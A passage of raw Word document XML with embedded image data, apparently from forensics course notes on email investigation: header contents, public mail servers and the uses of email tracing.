#10;z5XmZO7yt3Hl7c52/LjFfILNZf24cbv7O+08evlbv/ia6/xP8ffHfi/R30vUtekeykXZLHDDHCZR&#10;6MUUEg9xnB9K8+z7135Xl1bC1a1evyxdTlVoXsuVWvqlqzmxuLp1oU6VK7Ub6y3dz7a+OUfj+TxX&#10;4KHgV7lNOY4LWmfsqtuXBn28eVt9eMZxzVL4S2vim0+PevL4wu7K81htERi9gAEEfnKFBwq88HqM&#10;4Ir538N/tCePfCejxaXp+vMLOFdkKTwRzGJR0Cs6k4HQAnA7Vk6H8XPFvh3xJf6/Y61ImsXyeXc3&#10;U0cczSLkHGHUgfdHQcAY6V8/Dh/GRws8L+7+FxUrPmd5X1dtPlc9WWa4d1o1/f3TaurLS2ivr+B7&#10;54f/AOTZPiL/ANhO7/8AQ4q6P4wDxn/wqHwSfB/9peaI7b7T/Ze7zseSNmdvO3PXt0zXy3b/ABR8&#10;TWvhfUfDsWqbdH1CV5rq28iI+Y7EFjuK7hnaOhFe6fEf9ob+w/BvgpPBPiKM6hb2qxX8KwhwAIow&#10;AwdcZDA8jnrWWJyrF0cVTlCMZ81SUtbuKXKl72mm2nnYujjqFShNSk42il0vu9tfM9Q8Xt/xcz4P&#10;jUNn9uf6X523Gf8Aj1+fp23dO3Ws3y/Hi/tQb8ah/wAIebbrljZ+X5HT+7v87/gX4V8o3Pxa8WXn&#10;jK38VTazJLrtsCsFy8aERKVK7VQrsAwzcY7k9a6Bf2l/iOtrcwnxI7CcklzbQ71z12nZ8v4dO2KX&#10;+reNpwjGDhL924O99HKTleOnS+g/7Yw85Ny5l7ykrW1skrPXrbU+m/CzRtqnxlPhny/+Eg+1EQld&#10;ufN+yjZ7f67zevfrXNfDQ+Jx8D/HJ+If277N5M/k/wBsbvP2+Ud33/mxuxtz36V8seGvHWveD9af&#10;VtI1Wez1CTd5k4O4yZOTvDZDZPPIPNbXjX41eMviDYrY63rT3FiCGNtFGkKMR0LBAN3PPOcHpXTL&#10;h3Ec/s4yi4Nwbk7865Elp627mMc3pcvM01Jc2ityvmfX09D6o8O6Jd+FfCHgddb1TxP4hmla3W2s&#10;tERYoLfKgqJDGFJjVeCXcg4JxU/iFcftV+Fmx10GUZ+jTf418u6T+0J490Pw9Fotn4gkisoo/KiJ&#10;hjaSNAMBVcqWAA6c5HbFQXXx38cXniKx12bXN+q2MTw29x9kgBRH+8MBMHPuDjtXN/q5jpVKk5Sh&#10;7ymuq+LbRRsvP79Tb+18MoRjFS0cX06b63u/I9y0Hx9qWuftVTaNqmpSyaVa3twtnZSMPKjlSB0U&#10;geuC/wCJrrvC0fjz/hpDXmvhqA8K+Q3lmUt9k2bV8vy/4d2euOfvZ718bX3ijVNQ8RS69Neyf2vJ&#10;cfamu4sRv5uc7htwFOfTFd5L+018SJPs3/FSMht+QVtYBvOCPnGzDcHvxnB6jNdeL4frySWGUNaf&#10;I730e/MrLr/wTnoZrTTbrOWk+ZW6rs9TL+ODf8Xd8Wf9hCT+dcBet/oc/wD1zb+VaOua5e+JNXu9&#10;U1Gf7TfXchlml2qu5j1OFAA/AVl3h/0Sfn+Bv5GvuMJTdGjTpS3ikvuR83XmqlSc1s22fpH8Hf8A&#10;kkXgf/sB2P8A6TpXYVx/wd/5JF4H/wCwHY/+k6V2FfzRjP8Aeav+J/mfsWH/AIMPRfkFFFFcZ0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fP7TH/ACcH4y/7c/8A0kir9Bq/Pj9pn/k4&#10;Txj/ANuf/pJFX6DwT/v9X/r2/wD0qB8pxH/usP8AEvykeb5ozTc0Zr9mufno7NGabmjNFwHZozTc&#10;0ZouA7NGabmjNFwHZozTc0ZouA7NGabmjNFwHZozTc0ZouA7NGabmjNFwHZozTc0ZouA7NGabmjN&#10;FwHZozTc0ZouA7NGabmjNFwHZqK8P+iTf7jfyp+aiuz/AKLN/uN/KqjuhPY/Sb4O/wDJIvA//YDs&#10;f/SdK7CuP+Dv/JIvA/8A2A7H/wBJ0rsK/mLGf7zV/wAT/M/ZsP8AwYei/IKKKK4zo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I/ay8O6lofxn1zWbqymTStTjtnt7wRsYjtgSNlLAYDb&#10;kPHXGD3r73or3slzaWT4l11DmTVmr26p72fbseXmOBWYUVScrWd7791+p+UP9qW//PT9D/hR/alv&#10;/wA9P0P+Ffq9RX3H+vMf+gb/AMn/APtD5v8A1Zf/AD+/8l/+2Pyh/tS3/wCen6H/AAo/tS3/AOen&#10;6H/Cv1eoo/15j/0Df+T/AP2gf6sv/n9/5L/9sflD/alv/wA9P0P+FH9qW/8Az0/Q/wCFfq9RR/rz&#10;H/oG/wDJ/wD7QP8AVl/8/v8AyX/7Y/KH+1Lf/np+h/wo/tS3/wCen6H/AAr9XqKP9eY/9A3/AJP/&#10;APaB/qy/+f3/AJL/APbH5Q/2pb/89P0P+FH9qW//AD0/Q/4V+r1FH+vMf+gb/wAn/wDtA/1Zf/P7&#10;/wAl/wDtj8of7Ut/+en6H/Cj+1Lf/np+h/wr9XqKP9eY/wDQN/5P/wDaB/qy/wDn9/5L/wDbH5Q/&#10;2pb/APPT9D/hR/alv/z0/Q/4V+r1FH+vMf8AoG/8n/8AtA/1Zf8Az+/8l/8Atj8of7Ut/wDnp+h/&#10;wo/tS3/56fof8K/V6ij/AF5j/wBA3/k//wBoH+rL/wCf3/kv/wBsflD/AGpb/wDPT9D/AIUf2pb/&#10;APPT9D/hX6vUUf68x/6Bv/J//tA/1Zf/AD+/8l/+2Pyh/tS3/wCen6H/AAo/tS3/AOen6H/Cv1eo&#10;o/15j/0Df+T/AP2gf6sv/n9/5L/9sflD/alv/wA9P0P+FH9qW/8Az0/Q/wCFfq9RR/rzH/oG/wDJ&#10;/wD7QP8AVl/8/v8AyX/7Y/KH+1Lf/np+h/wo/tS3/wCen6H/AAr9XqKP9eY/9A3/AJP/APaB/qy/&#10;+f3/AJL/APbH5Q/2pb/89P0P+FTWqTa5L9h022nv7yYFY7e2iaR2J9ABmv1YopPjlfZw2v8Aj/8A&#10;tA/1ZfWt/wCS/wD2xzvw50e58O/D3wvpV4oS8sdLtbWZQcgOkKqwz9Qa6Kiivy6pUdWcqkt27/ef&#10;awioRUV0Ciiisy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BAi0AFAAGAAgA&#10;AAAhACsQ28AKAQAAFAIAABMAAAAAAAAAAAAAAAAAAAAAAFtDb250ZW50X1R5cGVzXS54bWxQSwEC&#10;LQAUAAYACAAAACEAOP0h/9YAAACUAQAACwAAAAAAAAAAAAAAAAA7AQAAX3JlbHMvLnJlbHNQSwEC&#10;LQAUAAYACAAAACEATLowiigFAACQFwAADgAAAAAAAAAAAAAAAAA6AgAAZHJzL2Uyb0RvYy54bWxQ&#10;SwECLQAUAAYACAAAACEAe8A4ksMAAAClAQAAGQAAAAAAAAAAAAAAAACOBwAAZHJzL19yZWxzL2Uy&#10;b0RvYy54bWwucmVsc1BLAQItABQABgAIAAAAIQBppaFS4QAAAAsBAAAPAAAAAAAAAAAAAAAAAIgI&#10;AABkcnMvZG93bnJldi54bWxQSwECLQAKAAAAAAAAACEA6Scb8KCyAACgsgAAFAAAAAAAAAAAAAAA&#10;AACWCQAAZHJzL21lZGlhL2ltYWdlMS5qcGdQSwECLQAKAAAAAAAAACEAJXLbWhWCAgAVggIAFAAA&#10;AAAAAAAAAAAAAABovAAAZHJzL21lZGlhL2ltYWdlMi5qcGdQSwUGAAAAAAcABwC+AQAArz4DAAAA&#10;">
                <v:rect id="Rectangle 641" o:spid="_x0000_s1027" style="position:absolute;left:3125;top:27717;width:29715;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rsidR="00943135" w:rsidRDefault="00943135" w:rsidP="004750F9">
                        <w:r>
                          <w:rPr>
                            <w:w w:val="86"/>
                          </w:rPr>
                          <w:t>Header</w:t>
                        </w:r>
                        <w:r>
                          <w:rPr>
                            <w:spacing w:val="-12"/>
                            <w:w w:val="86"/>
                          </w:rPr>
                          <w:t xml:space="preserve"> </w:t>
                        </w:r>
                        <w:r>
                          <w:rPr>
                            <w:w w:val="86"/>
                          </w:rPr>
                          <w:t>contains</w:t>
                        </w:r>
                        <w:r>
                          <w:rPr>
                            <w:spacing w:val="-12"/>
                            <w:w w:val="86"/>
                          </w:rPr>
                          <w:t xml:space="preserve"> </w:t>
                        </w:r>
                        <w:r>
                          <w:rPr>
                            <w:w w:val="86"/>
                          </w:rPr>
                          <w:t>useful</w:t>
                        </w:r>
                        <w:r>
                          <w:rPr>
                            <w:spacing w:val="-12"/>
                            <w:w w:val="86"/>
                          </w:rPr>
                          <w:t xml:space="preserve"> </w:t>
                        </w:r>
                        <w:r>
                          <w:rPr>
                            <w:w w:val="86"/>
                          </w:rPr>
                          <w:t>information-</w:t>
                        </w:r>
                      </w:p>
                    </w:txbxContent>
                  </v:textbox>
                </v:rect>
                <v:rect id="Rectangle 642" o:spid="_x0000_s1028" style="position:absolute;left:25467;top:27717;width:438;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rsidR="00943135" w:rsidRDefault="00943135" w:rsidP="004750F9">
                        <w:r>
                          <w:t xml:space="preserve"> </w:t>
                        </w:r>
                      </w:p>
                    </w:txbxContent>
                  </v:textbox>
                </v:rect>
                <v:rect id="Rectangle 643" o:spid="_x0000_s1029" style="position:absolute;left:3125;top:30130;width:1182;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rsidR="00943135" w:rsidRDefault="00943135" w:rsidP="004750F9">
                        <w:r>
                          <w:t>•</w:t>
                        </w:r>
                      </w:p>
                    </w:txbxContent>
                  </v:textbox>
                </v:rect>
                <v:rect id="Rectangle 644" o:spid="_x0000_s1030" style="position:absolute;left:5515;top:30130;width:23163;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rsidR="00943135" w:rsidRDefault="00943135" w:rsidP="004750F9">
                        <w:r>
                          <w:rPr>
                            <w:w w:val="88"/>
                          </w:rPr>
                          <w:t>Unique</w:t>
                        </w:r>
                        <w:r>
                          <w:rPr>
                            <w:spacing w:val="-12"/>
                            <w:w w:val="88"/>
                          </w:rPr>
                          <w:t xml:space="preserve"> </w:t>
                        </w:r>
                        <w:r>
                          <w:rPr>
                            <w:w w:val="88"/>
                          </w:rPr>
                          <w:t>identifying</w:t>
                        </w:r>
                        <w:r>
                          <w:rPr>
                            <w:spacing w:val="-12"/>
                            <w:w w:val="88"/>
                          </w:rPr>
                          <w:t xml:space="preserve"> </w:t>
                        </w:r>
                        <w:r>
                          <w:rPr>
                            <w:w w:val="88"/>
                          </w:rPr>
                          <w:t>number.</w:t>
                        </w:r>
                      </w:p>
                    </w:txbxContent>
                  </v:textbox>
                </v:rect>
                <v:rect id="Rectangle 645" o:spid="_x0000_s1031" style="position:absolute;left:22930;top:30130;width:438;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rsidR="00943135" w:rsidRDefault="00943135" w:rsidP="004750F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2" o:spid="_x0000_s1032" type="#_x0000_t75" style="position:absolute;left:41913;width:19290;height:30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gZxAAAANwAAAAPAAAAZHJzL2Rvd25yZXYueG1sRI9PawIx&#10;FMTvBb9DeEJvNaugyGoU/2D14EWt0OPr5nWzdPOyJFHXb28EocdhZn7DTOetrcWVfKgcK+j3MhDE&#10;hdMVlwq+TpuPMYgQkTXWjknBnQLMZ523Keba3fhA12MsRYJwyFGBibHJpQyFIYuh5xri5P06bzEm&#10;6UupPd4S3NZykGUjabHitGCwoZWh4u94sQoW56Gp95/bNixXlf05bdf+m9dKvXfbxQREpDb+h1/t&#10;nVYwGg7geSYdATl7AAAA//8DAFBLAQItABQABgAIAAAAIQDb4fbL7gAAAIUBAAATAAAAAAAAAAAA&#10;AAAAAAAAAABbQ29udGVudF9UeXBlc10ueG1sUEsBAi0AFAAGAAgAAAAhAFr0LFu/AAAAFQEAAAsA&#10;AAAAAAAAAAAAAAAAHwEAAF9yZWxzLy5yZWxzUEsBAi0AFAAGAAgAAAAhAOnBeBnEAAAA3AAAAA8A&#10;AAAAAAAAAAAAAAAABwIAAGRycy9kb3ducmV2LnhtbFBLBQYAAAAAAwADALcAAAD4AgAAAAA=&#10;">
                  <v:imagedata r:id="rId59" o:title=""/>
                </v:shape>
                <v:shape id="Shape 653" o:spid="_x0000_s1033" style="position:absolute;left:41913;width:19289;height:30071;visibility:visible;mso-wrap-style:square;v-text-anchor:top" coordsize="1928813,3007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7/twwAAANwAAAAPAAAAZHJzL2Rvd25yZXYueG1sRI9BawIx&#10;FITvBf9DeIK3mrVSqatRpKD0Ukq3Xrw9Ns/N6uZlSaLZ/vumUOhxmJlvmPV2sJ24kw+tYwWzaQGC&#10;uHa65UbB8Wv/+AIiRGSNnWNS8E0BtpvRwxpL7RJ/0r2KjcgQDiUqMDH2pZShNmQxTF1PnL2z8xZj&#10;lr6R2mPKcNvJp6JYSIst5wWDPb0aqq/VzSp492mZPsyloCSP7eFg65OsglKT8bBbgYg0xP/wX/tN&#10;K1g8z+H3TD4CcvMDAAD//wMAUEsBAi0AFAAGAAgAAAAhANvh9svuAAAAhQEAABMAAAAAAAAAAAAA&#10;AAAAAAAAAFtDb250ZW50X1R5cGVzXS54bWxQSwECLQAUAAYACAAAACEAWvQsW78AAAAVAQAACwAA&#10;AAAAAAAAAAAAAAAfAQAAX3JlbHMvLnJlbHNQSwECLQAUAAYACAAAACEANGu/7cMAAADcAAAADwAA&#10;AAAAAAAAAAAAAAAHAgAAZHJzL2Rvd25yZXYueG1sUEsFBgAAAAADAAMAtwAAAPcCAAAAAA==&#10;" path="m,l,3007121r1928813,l1928813,,,xe" filled="f" strokeweight="1pt">
                  <v:stroke miterlimit="1" joinstyle="miter"/>
                  <v:path arrowok="t" textboxrect="0,0,1928813,3007121"/>
                </v:shape>
                <v:shape id="Picture 656" o:spid="_x0000_s1034" type="#_x0000_t75" style="position:absolute;top:34679;width:61200;height:2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UwxwAAANwAAAAPAAAAZHJzL2Rvd25yZXYueG1sRI9BS8NA&#10;FITvgv9heUJv7UapqcRuSxUKpaC01YPentlnkjb7XtjdtvHfu0LB4zAz3zDTee9adSIfGmEDt6MM&#10;FHEptuHKwPvbcvgAKkRki60wGfihAPPZ9dUUCytn3tJpFyuVIBwKNFDH2BVah7Imh2EkHXHyvsU7&#10;jEn6SluP5wR3rb7Lslw7bDgt1NjRc03lYXd0Buzic7yafD35fdx/bF5eZSzrgxgzuOkXj6Ai9fE/&#10;fGmvrIH8Poe/M+kI6NkvAAAA//8DAFBLAQItABQABgAIAAAAIQDb4fbL7gAAAIUBAAATAAAAAAAA&#10;AAAAAAAAAAAAAABbQ29udGVudF9UeXBlc10ueG1sUEsBAi0AFAAGAAgAAAAhAFr0LFu/AAAAFQEA&#10;AAsAAAAAAAAAAAAAAAAAHwEAAF9yZWxzLy5yZWxzUEsBAi0AFAAGAAgAAAAhAE9AlTDHAAAA3AAA&#10;AA8AAAAAAAAAAAAAAAAABwIAAGRycy9kb3ducmV2LnhtbFBLBQYAAAAAAwADALcAAAD7AgAAAAA=&#10;">
                  <v:imagedata r:id="rId60" o:title=""/>
                </v:shape>
                <v:shape id="Shape 657" o:spid="_x0000_s1035" style="position:absolute;top:34679;width:61202;height:25185;visibility:visible;mso-wrap-style:square;v-text-anchor:top" coordsize="6120209,2518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cjxAAAANwAAAAPAAAAZHJzL2Rvd25yZXYueG1sRI9BawIx&#10;FITvgv8hvIIXqdkuaNutUbQgqLfa9v7cPHcXNy9LEt34702h4HGYmW+Y+TKaVlzJ+caygpdJBoK4&#10;tLrhSsHP9+b5DYQPyBpby6TgRh6Wi+FgjoW2PX/R9RAqkSDsC1RQh9AVUvqyJoN+Yjvi5J2sMxiS&#10;dJXUDvsEN63Ms2wmDTacFmrs6LOm8ny4GAXH82kfx7vdb9nHfN1eKve+zo9KjZ7i6gNEoBge4f/2&#10;ViuYTV/h70w6AnJxBwAA//8DAFBLAQItABQABgAIAAAAIQDb4fbL7gAAAIUBAAATAAAAAAAAAAAA&#10;AAAAAAAAAABbQ29udGVudF9UeXBlc10ueG1sUEsBAi0AFAAGAAgAAAAhAFr0LFu/AAAAFQEAAAsA&#10;AAAAAAAAAAAAAAAAHwEAAF9yZWxzLy5yZWxzUEsBAi0AFAAGAAgAAAAhAMiSFyPEAAAA3AAAAA8A&#10;AAAAAAAAAAAAAAAABwIAAGRycy9kb3ducmV2LnhtbFBLBQYAAAAAAwADALcAAAD4AgAAAAA=&#10;" path="m,l,2518569r6120209,l6120209,,,xe" filled="f" strokeweight="1pt">
                  <v:stroke miterlimit="1" joinstyle="miter"/>
                  <v:path arrowok="t" textboxrect="0,0,6120209,2518569"/>
                </v:shape>
                <w10:wrap type="square"/>
              </v:group>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
      <w:r w:rsidRPr="00943135">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">Everything after @ belongs to the domain name. -Investigating corporate emails is easier. </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005B2D4C" w:rsidRDefault="004750F9" w:rsidP="004750F9">
      <w:pPr>
        <w:ind w:left="-5" w:right="6516"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Calibri" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00943135">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Calibri" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t>Investigate in E-mail Header</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005B2D4C" w:rsidRPr="005B2D4C" w:rsidRDefault="004750F9" w:rsidP="004750F9">
      <w:pPr>
        <w:ind w:left="-5" w:right="6516"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Calibri" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00943135">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t>Search e-mail header in-</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="004750F9" w:rsidRPr="005B2D4C" w:rsidRDefault="005B2D4C" w:rsidP="004750F9">
      <w:pPr>
        <w:ind w:left="-5" w:right="6516"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Calibri" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> •  </w:t>
      </w:r>
      <w:r w:rsidR="004750F9" w:rsidRPr="00943135">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">GUI clients. </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="004750F9" w:rsidRPr="00943135" w:rsidRDefault="004750F9" w:rsidP="004750F9">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="20"/>
        </w:numPr>
        <w:spacing w:after="3" w:line="265" w:lineRule="auto"/>
        <w:ind w:right="56" w:hanging="376"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00943135">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">Command- line clients. </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="004750F9" w:rsidRPr="00943135" w:rsidRDefault="004750F9" w:rsidP="004750F9">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="20"/>
        </w:numPr>
        <w:spacing w:after="3" w:line="265" w:lineRule="auto"/>
        <w:ind w:right="56" w:hanging="376"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00943135">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">Web-based clients. </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="004750F9" w:rsidRPr="00943135" w:rsidRDefault="004750F9" w:rsidP="004750F9">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="20"/>
        </w:numPr>
        <w:spacing w:after="3" w:line="265" w:lineRule="auto"/>
        <w:ind w:right="56" w:hanging="376"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00943135">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">Sending time. </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="004750F9" w:rsidRPr="00943135" w:rsidRDefault="004750F9" w:rsidP="004750F9">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="20"/>
        </w:numPr>
        <w:spacing w:after="3" w:line="265" w:lineRule="auto"/>
        <w:ind w:right="56" w:hanging="376"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00943135">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">IP address of sending e-mail server. </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="004750F9" w:rsidRPr="00943135" w:rsidRDefault="004750F9" w:rsidP="004750F9">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="20"/>
        </w:numPr>
        <w:spacing w:after="764" w:line="265" w:lineRule="auto"/>
        <w:ind w:right="56" w:hanging="376"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00943135">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">IP address of e-mail client. </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="004750F9" w:rsidRPr="00943135" w:rsidRDefault="004750F9" w:rsidP="004750F9">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:ind w:left="-5"/>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Investigating E-mails from Public Servers </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="004750F9" w:rsidRPr="00943135" w:rsidRDefault="004750F9" w:rsidP="004750F9">
      <w:pPr>
        <w:ind w:left="-5" w:right="5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Try to ignore the use of your own email-id while investigating .Use public severs like yahoo, Hotmail.., etc. </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="004750F9" w:rsidRPr="00943135" w:rsidRDefault="004750F9" w:rsidP="004750F9">
      <w:pPr>
        <w:spacing w:after="386" w:line="263" w:lineRule="auto"/>
        <w:ind w:left="-15" w:right="5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Public: </w:t>
      </w:r>
      <w:r w:rsidRPr="00943135">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:u w:val="single" w:color="5E5E5E"/>
        </w:rPr>
        <w:t>whatever@hotmail.com</w:t>
      </w:r>
      <w:r w:rsidRPr="00943135">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00943135" w:rsidRDefault="004750F9" w:rsidP="004750F9">
      <w:pPr>
        <w:spacing w:after="5" w:line="263" w:lineRule="auto"/>
        <w:ind w:left="-5" w:right="5604"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Calibri" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00943135">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Calibri" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">Application of E-mail Investigation </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="004750F9" w:rsidRPr="00943135" w:rsidRDefault="00943135" w:rsidP="004750F9">
      <w:pPr>
        <w:spacing w:after="5" w:line="263" w:lineRule="auto"/>
        <w:ind w:left="-5" w:right="560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750F9" w:rsidRPr="00943135">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">Criminal undertaking. </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="004750F9" w:rsidRPr="00943135" w:rsidRDefault="004750F9" w:rsidP="004750F9">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="21"/>
        </w:numPr>
        <w:spacing w:after="3"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Civil litigation. </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="004750F9" w:rsidRPr="00943135" w:rsidRDefault="004750F9" w:rsidP="004750F9">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="21"/>
        </w:numPr>
        <w:spacing w:after="3"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E-mail tracing. </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="004750F9" w:rsidRPr="00943135" w:rsidRDefault="004750F9" w:rsidP="004750F9">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="21"/>
        </w:numPr>
        <w:spacing w:after="384"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Corporate security policy. </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00943135" w:rsidRDefault="004750F9" w:rsidP="004750F9">
      <w:pPr>
        <w:spacing w:after="5" w:line="263" w:lineRule="auto"/>
        <w:ind w:left="-5" w:right="5300"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Calibri" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00943135">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Calibri" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">Use specified E-mail Investigating tool </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="004750F9" w:rsidRPr="00943135" w:rsidRDefault="004750F9" w:rsidP="004750F9">
      <w:pPr>
        <w:spacing w:after="5" w:line="263" w:lineRule="auto"/>
        <w:ind w:left="-5" w:right="5300"/>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w:t>
      </w:r>
      <w:r w:rsidR="00943135">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">  </w:t>
      </w:r>
      <w:r w:rsidRPr="00943135">
        <w:rPr>
